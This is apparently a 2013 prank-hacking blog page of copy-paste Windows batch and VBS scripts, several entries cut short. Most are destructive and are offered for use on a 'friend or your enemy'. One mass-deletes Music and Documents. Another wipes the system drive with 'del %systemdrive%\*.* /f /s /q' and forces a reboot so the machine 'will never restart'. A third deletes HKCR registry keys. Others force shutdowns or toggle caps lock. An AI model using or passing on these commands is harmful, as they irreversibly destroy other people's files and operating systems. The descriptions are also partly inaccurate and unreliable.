@echo off
::-----Delete My Music-------::
del /f /q "C:\Users\%userprofile%\My Documents\My Music\*.*"
::---------------------------::
Save As batch.bat
Happy Hacking...
Sunday, 19 May 2013
Delete all documents
@echo off
::----Delete My Documents----::
del /f /q "C:\Users\%userprofile%\My Documents\*.*"
::---------------------------::
Save As batch.bat...
Saturday, 4 May 2013
Tutorial Destroy Anyone's Computer With This File
What the file will do ?
The file we are going to create will reboot the computer once and also
delete all the file needed by the computer to restart again, so you got
it right well if you are pranking with your friend or your enemy
remember that his or her computer will never restart unless new...
The Blue Screen Of Death PC and Laptop

What will this file do ?
It will appear the blue screen of death in windows and then the computer will shutdown.
Method :
1. Open Notepad and copy the code given below.
Code:
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
2. Save as "Anything.bat" (Without quotes &...
Tutorial Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT YOUR OWN RISK]
What will this VBS file do ?
This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM).
Method :
1. Open Notepad and copy the code given below
Code:
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your...
Stupidity Shutdown
What will the file do ?
This pops up a funny message then will shutdown the computer
Method :
1. Open Notepad and copy the code given below.
Code:
@echo off
msg * Fatal system error due to admin stupidity!
shutdown -c “Error! You are too stupid!” -s -t 10
2. Save as "Anything.bat" (Without...
Tutorial Crazy Caps Lock

What will this file do ?
This constantly turns caps lock on and off really fast continuously.
Method :
1. Open Notepad and copy the code given below.
Code:
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
2. Save as "Anything.vbs"...